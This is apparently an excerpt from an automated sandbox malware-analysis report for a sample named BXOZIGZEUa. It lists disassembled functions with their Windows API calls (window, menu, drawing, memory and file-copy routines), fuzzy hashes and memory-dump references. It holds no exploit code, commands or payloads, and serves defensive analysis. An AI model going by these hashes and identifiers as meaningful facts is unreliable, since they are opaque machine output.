Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: fb8890b4c5c68d31774b083e687a655fc513fa39d58349acaa57dc8e84718e08
Instruction ID: 8fd8094d5251e22a7b4bb0aff080dc5562fdb4009df02e4aeb02dc57dcea32e5
Opcode Fuzzy Hash: fb8890b4c5c68d31774b083e687a655fc513fa39d58349acaa57dc8e84718e08
Instruction Fuzzy Hash: 25112FB2500209BBCF24EB38DC08A6E7F69EF40300B840162E949DA3A4CB34DD00DA92

Function 002A2C2F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 002A2C57
GetStockObject.GDI32(0000000D), ref: 002A2C5F
GetObjectW.GDI32(00000000,0000005C,?), ref: 002A2C6C
GetDC.USER32(00000000), ref: 002A2C7B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A2C8F
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 002A2C9B
ReleaseDC.USER32(00000000,00000000), ref: 002A2CA7

Strings

System, xrefs: 002A2C52, 002A2CBC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 4c478cd628138b3f8fdfc763edcc00c9314cea188b7067e780c9dc124cc538eb
Instruction ID: 8a39e2013b525f7f0209a530c4eb0c42c6f5999e835e06910f1186985d51c949
Opcode Fuzzy Hash: 4c478cd628138b3f8fdfc763edcc00c9314cea188b7067e780c9dc124cc538eb
Instruction Fuzzy Hash: 67118F71650358EBEB109BA5EC89FAE7BA9EB55751F01001AFA09AF1C0DE709D05CB60

Function 001E0CBE Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001E0CC8
GetWindowRect.USER32(?,?), ref: 001E0D17
OffsetRect.USER32(?,?,?), ref: 001E0D2D

Part of subcall function 001D03A2: __EH_prolog3.LIBCMT ref: 001D03A9
Part of subcall function 001D03A2: GetDC.USER32(00000000), ref: 001D03D5

CreateCompatibleDC.GDI32(?), ref: 001E0D9E
SelectObject.GDI32(?,?), ref: 001E0DBE
SelectObject.GDI32(?,?), ref: 001E0E00
CreateCompatibleDC.GDI32(?), ref: 001E0F19
SelectObject.GDI32(?,?), ref: 001E0F39
SelectObject.GDI32(?,00000000), ref: 001E0F69

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateRect$H_prolog3H_prolog3_OffsetWindow
String ID:
API String ID: 2818906880-0
Opcode ID: f43d5183107965b08a61492f0fd2f3911020c69794c46fe96fbd19f3ece10c86
Instruction ID: a64179ba5f8fad36c262d2824f9de2664bd0611825359b1741bf196d561ad4f8
Opcode Fuzzy Hash: f43d5183107965b08a61492f0fd2f3911020c69794c46fe96fbd19f3ece10c86
Instruction Fuzzy Hash: 06A11471D00259EFCF15EFA5C984AEEBBB5BF18300F1441AAE90AB7251DB705A45CFA0

Function 001CA974 Relevance: 13.7, APIs: 9, Instructions: 233filecomstringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001CA97B
OleDuplicateData.OLE32(?,?,00000000), ref: 001CA9FC
GlobalLock.KERNEL32(00000000), ref: 001CAA2B
CopyMetaFileW.GDI32(?,00000000), ref: 001CAA37
GlobalUnlock.KERNEL32(?), ref: 001CAA47
GlobalFree.KERNEL32(?), ref: 001CAA50
GlobalUnlock.KERNEL32(?), ref: 001CAA5C
lstrlenW.KERNEL32(?,0000005C,002A2FF2,?,?,?), ref: 001CAABC
CopyFileW.KERNEL32(?,?,00000000,?,?,0000005C,002A2FF2,?,?,?), ref: 001CABB4

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3_LockMetalstrlen
String ID:
API String ID: 3489744035-0
Opcode ID: 7f10b98e3f94361ef9ed46dc4740293b523029e80fc8d977d32c147c59f29873
Instruction ID: 36d5c5de49bfdffaa3e2d671dfcee6ad535a7894eb5a5a85afa7f19a5441397a
Opcode Fuzzy Hash: 7f10b98e3f94361ef9ed46dc4740293b523029e80fc8d977d32c147c59f29873
Instruction Fuzzy Hash: F3818EB190060AAFDB159FA4CD88E3ABBB9FF64308751851DF45ADB650DB30EC11CBA1

Function 001DF1E7 Relevance: 13.7, APIs: 9, Instructions: 168windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0020B291: GetParent.USER32(?), ref: 0020B29D
Part of subcall function 0020B291: GetParent.USER32(00000000), ref: 0020B2A0

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

GetParent.USER32(?), ref: 001DF248
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 001DF25D
GetClientRect.USER32(?,?), ref: 001DF2C4
GetClientRect.USER32(?,?), ref: 001DF2D9

Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D016D
Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D017A

GetWindowRect.USER32(?,?), ref: 001DF2F9

Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F

GetParent.USER32(?), ref: 001DF348
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 001DF35C
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 001DF3B1
PostMessageW.USER32(?,00000000,00000000), ref: 001DF3D3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientMessageParent$RectSendWindow$Screen$LongPost
String ID:
API String ID: 3884207962-0
Opcode ID: 51368319cd24e514d49f180a27b024a41bb04cade6389bd91a13d557b8053f2d
Instruction ID: 57d0b4c12bfe01a963d00f6fb522d902d8fb572fa95e70cdc4408d2a18a8ede8
Opcode Fuzzy Hash: 51368319cd24e514d49f180a27b024a41bb04cade6389bd91a13d557b8053f2d
Instruction Fuzzy Hash: 59610BB1900209AFCF15DFA9DC85AAEBBF5FF88300F11456AF945AB261DB719901CF60

Function 002077A2 Relevance: 13.6, APIs: 9, Instructions: 150windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001D1116: GetFocus.USER32 ref: 001D111C
Part of subcall function 001D1116: GetParent.USER32(00000000), ref: 001D1144
Part of subcall function 001D1116: GetWindowLongW.USER32(?,000000F0), ref: 001D115F
Part of subcall function 001D1116: GetParent.USER32(?), ref: 001D116D
Part of subcall function 001D1116: GetDesktopWindow.USER32 ref: 001D1171
Part of subcall function 001D1116: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 001D1185

GetMenu.USER32(?), ref: 0020781C
GetMenuItemCount.USER32(?), ref: 0020784C
GetSubMenu.USER32(?,00000000), ref: 0020785D
GetMenuItemCount.USER32(?), ref: 0020787F
GetMenuItemID.USER32(?,00000000), ref: 002078A0
GetSubMenu.USER32(?,00000000), ref: 002078B8
GetMenuItemID.USER32(?,00000000), ref: 002078D0
GetMenuItemCount.USER32(?), ref: 00207907
GetMenuItemID.USER32(?,00000000), ref: 00207922

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 932eb70e429ab18102ea570d0e341efb089ea147b8e2db8ffdca6d986bb390e2
Instruction ID: 1c916832c2150b2b394824825b5b0db8686f06a34a61ee17d83e7d4e406de5c8
Opcode Fuzzy Hash: 932eb70e429ab18102ea570d0e341efb089ea147b8e2db8ffdca6d986bb390e2
Instruction Fuzzy Hash: C6516130D1430A9FCF119FA4CDC8AADBBB5FF58310F208569E456A61A2D731ED51DB60

Function 00209CAB Relevance: 13.6, APIs: 9, Instructions: 134timekeyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000001), ref: 00209CB8
GetCursorPos.USER32(?), ref: 00209CDF
ScreenToClient.USER32(?,?), ref: 00209CEC
GetCapture.USER32 ref: 00209D41

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

ClientToScreen.USER32(?,?), ref: 00209D88
WindowFromPoint.USER32(?,?), ref: 00209D94
IsChild.USER32(?,00000000), ref: 00209DA9
KillTimer.USER32(?,0000E001), ref: 00209DE6
KillTimer.USER32(?,0000E000), ref: 00209E02

Part of subcall function 001DBF29: GetForegroundWindow.USER32 ref: 001DBF3D
Part of subcall function 001DBF29: GetLastActivePopup.USER32(?), ref: 001DBF4E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromH_prolog3LastPointPopupStateThrow
String ID:
API String ID: 1544770960-0
Opcode ID: 239e5c26b9858f8d65658f094bd4763a5c96a8b3b3c12b55913ab956c888bb12
Instruction ID: ace95caeefe19a8f89094b04c6f686656ac16331ecb38734f0a262b6ee5047cd
Opcode Fuzzy Hash: 239e5c26b9858f8d65658f094bd4763a5c96a8b3b3c12b55913ab956c888bb12
Instruction Fuzzy Hash: 13417031660706AFCB20AF64DC88AAEBBB6FF54310B104669E456D72E3DB31DD90CB40

Function 001E9975 Relevance: 13.6, APIs: 9, Instructions: 129windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,0000420F,00000001), ref: 001E99C9
EnableMenuItem.USER32(?,0000420E,00000001), ref: 001E99E5
CheckMenuItem.USER32(?,00004213,00000008), ref: 001E9A1A
EnableMenuItem.USER32(?,00004212,00000001), ref: 001E9A3A
EnableMenuItem.USER32(?,00004212,00000001), ref: 001E9A5E
EnableMenuItem.USER32(?,00004213,00000001), ref: 001E9A6A
EnableMenuItem.USER32(?,00004214,00000001), ref: 001E9A76
EnableMenuItem.USER32(?,00004215,00000001), ref: 001E9ABE
CheckMenuItem.USER32(?,00004215,00000008), ref: 001E9AD2

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ItemMenu$Enable$Check
String ID:
API String ID: 1852492618-0
Opcode ID: aca8a10e57b4855c57c6b0accebea6c32cf6fd98ff6b9a0df050859c8213250a
Instruction ID: bdbc19ba74d3bed2812e03f81cd73941cac51f85288907f505168e1d487640c7
Opcode Fuzzy Hash: aca8a10e57b4855c57c6b0accebea6c32cf6fd98ff6b9a0df050859c8213250a
Instruction Fuzzy Hash: 6041B370780A81ABDB248F17CD85B69B7A1BF90704F558079B909AF2E5D7B1DC80CB94

Function 001D14E2 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 001D14E9
EnterCriticalSection.KERNEL32(?,00000010,001D16B2,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D14FA
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D1518
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D154C
LeaveCriticalSection.KERNEL32(001C106C,?,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D15B8
_memset.LIBCMT ref: 001D15D7
TlsSetValue.KERNEL32(?,00000000), ref: 001D15E8
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D1609

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: a0f99d99901e488658b970a42f2524b306d2211455c5de27712e796cdb851d6f
Instruction ID: a134ffeed29d9d0d0d4af4371c6304c1a349b9c6534b24d83753b25e90bb4a81
Opcode Fuzzy Hash: a0f99d99901e488658b970a42f2524b306d2211455c5de27712e796cdb851d6f
Instruction Fuzzy Hash: 68318BB1500605BFCB24EF10E885D6ABBB5FF54310B21C52EF55A9A660CB31ED50CF90

Function 00235049 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 472COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00235053
GetObjectW.GDI32(?,00000018,?), ref: 00235106
DeleteObject.GDI32(?), ref: 002351D2
_memset.LIBCMT ref: 002353B5
_memset.LIBCMT ref: 00235411
DeleteObject.GDI32(?), ref: 002355C9

Strings

TR/, xrefs: 00235361, 0023557E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Delete_memset$H_prolog3
String ID: TR/
API String ID: 1235337548-3081264625
Opcode ID: f72d26c809d21fa59730186fe97273c9066be85e778e8c36580b86aa2bdbe027
Instruction ID: 47d03bb42022412a50439be6a6f129ddaeb37de94b643118013eaa676729cfb7
Opcode Fuzzy Hash: f72d26c809d21fa59730186fe97273c9066be85e778e8c36580b86aa2bdbe027
Instruction Fuzzy Hash: D3224AB0D1062ADFCF18DFA4C9816EDBBB5FF08700F10809AE559AB251DB715AA5CF90

Function 002173E0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 369windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002173E7
GetWindow.USER32(?,00000005), ref: 00217407
GetWindow.USER32(?,00000002), ref: 0021743D
IsWindowVisible.USER32(?), ref: 00217521
GetWindow.USER32(?,00000002), ref: 002177B1

Strings

2, xrefs: 00217788
83/, xrefs: 002174E7, 002177F6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$H_prolog3Visible
String ID: 83/$2
API String ID: 3969123015-1965019549
Opcode ID: 615ae14ae8f4566fd926f37b5acb02281b085f8996dcb10f04286134222c8120
Instruction ID: a6bb647044c31915272a2cb136a13cf1dd1eb27161c395304e8cc31affb951f5
Opcode Fuzzy Hash: 615ae14ae8f4566fd926f37b5acb02281b085f8996dcb10f04286134222c8120
Instruction Fuzzy Hash: 8ED17D30A146069FDF15EF64C889AFDB7F6BFA8300F140169E846AB291DF349D91CB61

Function 0020FEA7 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 246windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0020FFBC
GetWindowRect.USER32(?,?), ref: 0020FFD5
PtInRect.USER32(?,?,?), ref: 0020FFF3
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00210004
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0021005C

Part of subcall function 001DAB9B: GetParent.USER32(?), ref: 001DABA5

GetFocus.USER32 ref: 00210138

Part of subcall function 001FD042: __EH_prolog3_GS.LIBCMT ref: 001FD04C
Part of subcall function 001FD042: GetWindowRect.USER32(?,?), ref: 001FD0E5
Part of subcall function 001FD042: SetRect.USER32(0020FF16,00000000,00000000,?,?), ref: 001FD107
Part of subcall function 001FD042: CreateCompatibleDC.GDI32(?), ref: 001FD113
Part of subcall function 001FD042: CreateCompatibleBitmap.GDI32(?,0020FF16,`2), ref: 001FD13D
Part of subcall function 001FD042: GetWindowRect.USER32(?,?), ref: 001FD19F
Part of subcall function 001FD042: GetClientRect.USER32(?,?), ref: 001FD1A8

Strings

`2, xrefs: 0020FEE3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$CompatibleCreateMessageSend$BitmapClientCursorFocusH_prolog3_Parent
String ID: `2
API String ID: 2914356772-2259872102
Opcode ID: 0e5dbbb8cd497f77e92234eeb30d0b89d5b47c27ac2ca49e1743235fb9800920
Instruction ID: 99339ec58d9326205fc68e0771214c53d3e52fdcc5e98ebcd6f9aac358b1f188
Opcode Fuzzy Hash: 0e5dbbb8cd497f77e92234eeb30d0b89d5b47c27ac2ca49e1743235fb9800920
Instruction Fuzzy Hash: 6D81E4707107069FCB269F6498C5ABEB7EAFF98700F24456EF4458B292DBB19CD08B50

Function 001E8953 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

83/, xrefs: 001E8A93

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: 83/
API String ID: 0-2323854675
Opcode ID: c28ee5e979c7d7f8e60c80e218802156e96a947d8bc52e0403f0556230c39eca
Instruction ID: 32589c4959240b071e46428e1b38c6999efd97196beca0c7cc173b8fa905a0f8
Opcode Fuzzy Hash: c28ee5e979c7d7f8e60c80e218802156e96a947d8bc52e0403f0556230c39eca
Instruction Fuzzy Hash: 5B517A71300A40AFDB25AF65C889F6EB7E9AF88704F110569F94ADB2A1DF70ED00CB50

Function 001EC099 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 001EC112
SendMessageW.USER32(00000000,0000040C,00000000,00000000), ref: 001EC151
SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 001EC180
SetRectEmpty.USER32(?), ref: 001EC1DA
SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 001EC240
RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 001EC266

Strings

To/, xrefs: 001EC11F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$EmptyParentRectRedrawWindow
String ID: To/
API String ID: 3879113052-3711964495
Opcode ID: 5aadf9c324015e093cd98fb7854e903c2935a7237c5b6b5fdd463fad5bd53af9
Instruction ID: 12e21d0556222d0b11282f5156d08d28e4094e891b1a437c5ac5950a9137c57f
Opcode Fuzzy Hash: 5aadf9c324015e093cd98fb7854e903c2935a7237c5b6b5fdd463fad5bd53af9
